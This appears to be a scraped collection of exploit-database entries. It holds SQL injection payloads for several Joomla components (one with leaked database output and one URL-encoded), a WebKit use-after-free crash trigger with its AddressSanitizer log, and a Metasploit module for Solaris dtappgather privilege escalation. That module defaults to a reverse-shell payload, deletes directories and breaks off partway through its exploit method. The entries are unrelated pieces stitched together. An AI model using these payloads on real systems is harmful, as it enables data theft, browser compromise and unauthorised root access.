#  letter=" AND (SELECT 66 FROM(SELECT COUNT(*),CONCAT(CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(SELECT (ELT(66=66 ,1))),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VerAyari
#  HTTP/1.1 500 Duplicate entry 'multipla_multi@localhost : multipla_dictionary : 10.2.17-MariaDB' for key 'group_key' SQL=SELECT .............
#  Server: nginx admin
#  Date: Mon, 17 Sep 2018 16:15:28 GMT
#  Content-Type: text/html; charset=utf-8
#  Transfer-Encoding: chunked
#  Connection: keep-alive
#  Cache-Control: no-cache
#  Pragma: no-cache
#  
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Timetable Schedule 3.6.8 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: http://osthemeclub.com/
# Software Link: https://extensions.joomla.org/extensions/extension/calendars-a-events/timetable-schedule/
# Version: 3.6.8
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17394
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# 
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_timetableschedule&view=schedule&Itemid=492&eid=[SQL]
# 
# # # #
HireHackking 
# # # # #
# Exploit Title: Joomla! Component Article Factory Manager 4.3.9 - SQL Injection
# Dork: N/A
# Date: 2018-09-24
# Vendor Homepage: https://thephpfactory.com/
# Software Link: https://extensions.joomla.org/extensions/extension/authoring-a-content/content-submission/article-factory-manager/
# Version: 4.3.9
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-17380
# # # # #
# Exploit Author: Ihsan Sencan
# # # # #
# POC: 
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_articleman&view=articles&filter_search=&start_date=[SQL]&end_date=&m_start_date=[SQL]&m_end_date=[SQL]
# 
# %31%27%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%63%6f%75%6e%74%28%2a%29%2c%63%6f%6e%63%61%74%28%28%73%65%6c%65%63%74%28%73%65%6c%65%63%74%20%63%6f%6e%63%61%74%28%63%61%73%74%28%64%61%74%61%62%61%73%65%28%29%20%61%73%20%63%68%61%72%29%2c%30%78%37%65%29%29%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%77%68%65%72%65%20%74%61%62%6c%65%5f%73%63%68%65%6d%61%3d%64%61%74%61%62%61%73%65%28%29%20%6c%69%6d%69%74%20%30%2c%31%29%2c%66%6c%6f%6f%72%28%72%61%6e%64%28%30%29%2a%32%29%29%78%20%66%72%6f%6d%20%69%6e%66%6f%72%6d%61%74%69%6f%6e%5f%73%63%68%65%6d%61%2e%74%61%62%6c%65%73%20%67%72%6f%75%70%20%62%79%20%78%29%61%29%20%41%4e%44%20%27%27%3d%27
#  
# # # #
HireHackking 
<!--
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on the ASan build of the latest WebKit source on OSX.

PoC:

=================================================================
-->

<script>
function eventhandler2() {
try { var var00138 = svgvar00013.parentNode; } catch(e) { }
try { htmlvar00006.setAttribute("onfocusin", "eventhandler2()"); } catch(e) { }
try { svgvar00001.after(var00138); } catch(e) { }
}
function eventhandler5() {
try { htmlvar00028.autofocus = true; } catch(e) { }
try { htmlvar00034.appendChild(htmlvar00006); } catch(e) { }
}
</script>
<h5 id="htmlvar00006">
<keygen id="htmlvar00028">
</h5>
<a id="htmlvar00034">
<svg id="svgvar00001">
<g onload="eventhandler2()"></g>
<animate attributeName="fill" />
<polygon id="svgvar00013" />
<br>
<details ontoggle="eventhandler5()" open="true"></details>

<!--
=================================================================

ASan log:

=================================================================
==25305==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300014ff80 at pc 0x00052bbd87c6 bp 0x7ffee9af05b0 sp 0x7ffee9af05a8
READ of size 8 at 0x60300014ff80 thread T0
==25305==WARNING: invalid path to external symbolizer!
==25305==WARNING: Failed to use and restart external symbolizer!
    #0 0x52bbd87c5 in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd87c5)
    #1 0x52bdc5c22 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc5c22)
    #2 0x52bdc2fae in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc2fae)
    #3 0x52bdc16ec in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc16ec)
    #4 0x52b134d02 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3134d02)
    #5 0x52b1e5cf9 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x31e5cf9)
    #6 0x7fff54e0e063 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8f063)
    #7 0x7fff54e0dcd6 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ecd6)
    #8 0x7fff54e0d7d9 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e7d9)
    #9 0x7fff54e04daa in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x85daa)
    #10 0x7fff54e041a2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x851a2)
    #11 0x7fff540ead95 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fd95)
    #12 0x7fff540eab05 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb05)
    #13 0x7fff540ea883 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f883)
    #14 0x7fff5239ca72 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a72)
    #15 0x7fff52b32e33 in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7e33)
    #16 0x7fff52391884 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36884)
    #17 0x7fff52360a71 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5a71)
    #18 0x7fff7cf6cdc6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x10dc6)
    #19 0x7fff7cf6ba19 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xfa19)
    #20 0x10610d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
    #21 0x7fff7cc12014 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1014)

0x60300014ff80 is located 0 bytes inside of 32-byte region [0x60300014ff80,0x60300014ffa0)
freed by thread T0 here:
    #0 0x10a249fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
    #1 0x537a50c12 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeec12)
    #2 0x52bbd9c62 in WebCore::SVGAnimateElementBase::resetAnimatedPropertyType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd9c62)
    #3 0x52bc4a365 in WebCore::SVGDocumentExtensions::clearTargetDependencies(WebCore::SVGElement&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c4a365)
    #4 0x52bc4bcce in WebCore::SVGElement::removedFromAncestor(WebCore::Node::RemovalType, WebCore::ContainerNode&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c4bcce)
    #5 0x52a3ff8a2 in WebCore::notifyNodeRemovedFromDocument(WebCore::ContainerNode&, WebCore::TreeScopeChange, WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ff8a2)
    #6 0x52a3ff737 in WebCore::notifyChildNodeRemoved(WebCore::ContainerNode&, WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23ff737)
    #7 0x52a3f868c in WebCore::ContainerNode::removeChild(WebCore::Node&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f868c)
    #8 0x52a3f67c2 in WebCore::collectChildrenAndRemoveFromOldParent(WebCore::Node&, WTF::Vector<WTF::Ref<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, 11ul, WTF::CrashOnOverflow, 16ul>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f67c2)
    #9 0x52a3f56ef in WebCore::ContainerNode::insertBefore(WebCore::Node&, WebCore::Node*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x23f56ef)
    #10 0x52a58b557 in WebCore::Node::after(WTF::Vector<WTF::Variant<WTF::RefPtr<WebCore::Node, WTF::DumbPtrTraits<WebCore::Node> >, WTF::String>, 0ul, WTF::CrashOnOverflow, 16ul>&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x258b557)
    #11 0x5288bb99a in WebCore::jsElementPrototypeFunctionAfterBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x8bb99a)
    #12 0x52889d3e7 in long long WebCore::IDLOperation<WebCore::JSElement>::call<&(WebCore::jsElementPrototypeFunctionAfterBody(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x89d3e7)
    #13 0x56962e86176  (<unknown module>)
    #14 0x537a7434d in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11234d)
    #15 0x537a743a8 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1123a8)
    #16 0x537a6d9da in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x10b9da)
    #17 0x5397d8344 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1e76344)
    #18 0x539da9169 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x2447169)
    #19 0x539da92fb in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24472fb)
    #20 0x539da96a1 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x24476a1)
    #21 0x529ea73f8 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ea73f8)
    #22 0x529ef58cc in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1ef58cc)
    #23 0x52a534bfe in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener, WTF::DumbPtrTraits<WebCore::RegisteredEventListener> >, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2534bfe)
    #24 0x52a5301ce in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25301ce)
    #25 0x52a5137a0 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25137a0)
    #26 0x52a527924 in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2527924)
    #27 0x52a52726e in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x252726e)
    #28 0x52a526cfd in WebCore::EventDispatcher::dispatchScopedEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2526cfd)
    #29 0x52a505ec6 in WebCore::Element::dispatchFocusInEvent(WTF::AtomicString const&, WTF::RefPtr<WebCore::Element, WTF::DumbPtrTraits<WebCore::Element> >&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2505ec6)

previously allocated by thread T0 here:
    #0 0x10a249a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
    #1 0x7fff7cdbb1bc in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x21bc)
    #2 0x537a51124 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xef124)
    #3 0x537a4d82d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0xeb82d)
    #4 0x5379acdcb in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4adcb)
    #5 0x5379ac11a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x4a11a)
    #6 0x52bbe8608 in WebCore::SVGAnimatedTypeAnimator::operator new(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3be8608)
    #7 0x52bbd9dcc in WebCore::SVGAnimatorFactory::create(WebCore::SVGAnimationElement*, WebCore::SVGElement*, WebCore::AnimatedPropertyType) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd9dcc)
    #8 0x52bbd7c93 in WebCore::SVGAnimateElementBase::ensureAnimator() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd7c93)
    #9 0x52bbd816e in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd816e)
    #10 0x52bdc5c22 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc5c22)
    #11 0x52bdc2fae in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc2fae)
    #12 0x52bdc29dd in WebCore::SMILTimeContainer::begin() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3dc29dd)
    #13 0x52bc4505d in WebCore::SVGDocumentExtensions::startAnimations() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3c4505d)
    #14 0x52a44da69 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x244da69)
    #15 0x52ad44f77 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d44f77)
    #16 0x52ad431bc in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d431bc)
    #17 0x52a4709b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24709b2)
    #18 0x52aa98e24 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a98e24)
    #19 0x52ad2970b in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2d2970b)
    #20 0x52acf2deb in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2cf2deb)
    #21 0x52ae35097 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e35097)
    #22 0x52ae31abe in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2e31abe)
    #23 0x52adc8f7e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2dc8f7e)
    #24 0x106f097cb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdec7cb)
    #25 0x106f0dd2e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf0d2e)
    #26 0x106f0d02e in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf002e)
    #27 0x1064f5978 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x3d8978)
    #28 0x10626ee2e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x151e2e)
    #29 0x106278bd6 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x15bbd6)

SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3bd87c5) in WebCore::SVGAnimateElementBase::resetAnimatedType()
Shadow bytes around the buggy address:
  0x1c0600029fa0: fa fa fd fd fd fa fa fa fd fd fd fd fa fa fd fd
  0x1c0600029fb0: fd fd fa fa fd fd fd fa fa fa fd fd fd fa fa fa
  0x1c0600029fc0: fd fd fd fa fa fa fd fd fd fa fa fa 00 00 00 fa
  0x1c0600029fd0: fa fa fd fd fd fa fa fa fd fd fd fa fa fa 00 00
  0x1c0600029fe0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
=>0x1c0600029ff0:[fd]fd fd fd fa fa fd fd fd fd fa fa 00 00 00 00
  0x1c060002a000: fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa 00 00
  0x1c060002a010: 00 00 fa fa 00 00 00 00 fa fa 00 00 00 00 fa fa
  0x1c060002a020: 00 00 00 00 fa fa 00 00 00 03 fa fa 00 00 00 04
  0x1c060002a030: fa fa 00 00 00 04 fa fa 00 00 00 fa fa fa 00 00
  0x1c060002a040: 00 04 fa fa 00 00 00 fa fa fa 00 00 00 04 fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==25305==ABORTING


WebKit bug tracker link: https://bugs.webkit.org/show_bug.cgi?id=186658
Apple product security report ID: 693279835
-->
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Solaris::Priv
  include Msf::Post::Solaris::System
  include Msf::Post::Solaris::Kernel
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Solaris 'EXTREMEPARR' dtappgather Privilege Escalation",
      'Description'    => %q{
        This module exploits a directory traversal vulnerability in the
        `dtappgather` executable included with Common Desktop Environment (CDE)
        on unpatched Solaris systems prior to Solaris 10u11 which allows users
        to gain root privileges.

        dtappgather allows users to create a user-owned directory at any
        location on the filesystem using the `DTUSERSESSION` environment
        variable.

        This module creates a directory in `/usr/lib/locale`, writes a shared
        object to the directory, and runs the specified SUID binary with the
        shared object loaded using the `LC_TIME` environment variable.

        This module has been tested successfully on:

        Solaris 9u7 (09/04) (x86);
        Solaris 10u1 (01/06) (x86);
        Solaris 10u2 (06/06) (x86);
        Solaris 10u4 (08/07) (x86);
        Solaris 10u8 (10/09) (x86);
        Solaris 10u9 (09/10) (x86).
      },
      'References'     =>
        [
          ['BID', '97774'],
          ['CVE', '2017-3622'],
          ['EDB', '41871'],
          ['URL', 'https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh'],
          ['URL', 'http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html']
        ],
      'Notes'          => { 'AKA' => ['EXTREMEPARR'] },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Shadow Brokers',   # exploit
          'Hacker Fantastic', # dtappgather-poc.sh
          'Brendan Coles'     # Metasploit
        ],
      'DisclosureDate' => 'Apr 24 2017',
      'Privileged'     => true,
      'Platform'       => ['solaris', 'unix'],
      'Arch'           => [ARCH_X86, ARCH_X64, ARCH_SPARC],
      'Targets'        => [['Auto', {}]],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'DefaultOptions' =>
        {
          'PAYLOAD'     => 'solaris/x86/shell_reverse_tcp',
          'WfsDelay'    => 10,
          'PrependFork' => true
        },
      'DefaultTarget'  => 0))
    register_options [
      # Some useful example SUID executables:
      # * /usr/bin/at
      # * /usr/bin/cancel
      # * /usr/bin/chkey
      # * /usr/bin/lp
      # * /usr/bin/lpset
      # * /usr/bin/lpstat
      # * /usr/lib/lp/bin/netpr
      # * /usr/sbin/lpmove
      OptString.new('SUID_PATH', [true, 'Path to suid executable', '/usr/bin/at']),
      OptString.new('DTAPPGATHER_PATH', [true, 'Path to dtappgather executable', '/usr/dt/bin/dtappgather'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit',  [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def suid_bin_path
    datastore['SUID_PATH']
  end

  def dtappgather_path
    datastore['DTAPPGATHER_PATH']
  end

  def mkdir(path)
    vprint_status "Creating directory '#{path}'"
    cmd_exec "mkdir -p '#{path}'"
    register_dir_for_cleanup path
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_compile(path, data)
    upload "#{path}.c", data

    output = cmd_exec "PATH=$PATH:/usr/sfw/bin/:/opt/sfw/bin/:/opt/csw/bin gcc -fPIC -shared -g -lc -o #{path} #{path}.c"
    unless output.blank?
      print_error output
      fail_with Failure::Unknown, "#{path}.c failed to compile"
    end

    register_file_for_cleanup path
  end

  def symlink(link_target, link_name)
    vprint_status "Symlinking #{link_target} to #{link_name}"
    rm_f link_name
    cmd_exec "ln -sf #{link_target} #{link_name}"
    register_file_for_cleanup link_name
  end

  def check
    [dtappgather_path, suid_bin_path].each do |path|
      unless setuid? path
        vprint_error "#{path} is not setuid"
        return CheckCode::Safe
      end
      vprint_good "#{path} is setuid"
    end

    unless has_gcc?
      vprint_error 'gcc is not installed'
      return CheckCode::Safe
    end
    vprint_good 'gcc is installed'

    version = kernel_release
    if version.to_s.eql? ''
      vprint_error 'Could not determine Solaris version'
      return CheckCode::Detected
    end

    unless Gem::Version.new(version).between? Gem::Version.new('5.7'), Gem::Version.new('5.10')
      vprint_error "Solaris version #{version} is not vulnerable"
      return CheckCode::Safe
    end
    vprint_good "Solaris version #{version} appears to be vulnerable"

    CheckCode::Appears
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless [CheckCode::Detected, CheckCode::Appears].include? check
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    # Remove appmanager directory and contents
    appmanager_path = '/var/dt/appconfig/appmanager'
    vprint_status "Cleaning appmanager directory #{appmanager_path}"
    cmd_exec "chmod -R 755 #{appmanager_path}/*"
    cmd_exec "rm -rf #{appmanager_path}/*"
    rm_f appmanager_path

    # Create writable directory in /usr/lib/locale
    locale_path = '/usr/lib/locale'
    locale_name = rand_text_alphanumeric 5..10
    new_dir = "#{locale_path}/#{locale_name}"
    vprint_status "Creating directory #{new_dir}"
    depth = 3
    cmd_exec "DTUSERSESSION=. /usr/dt/bin/dtappgather"
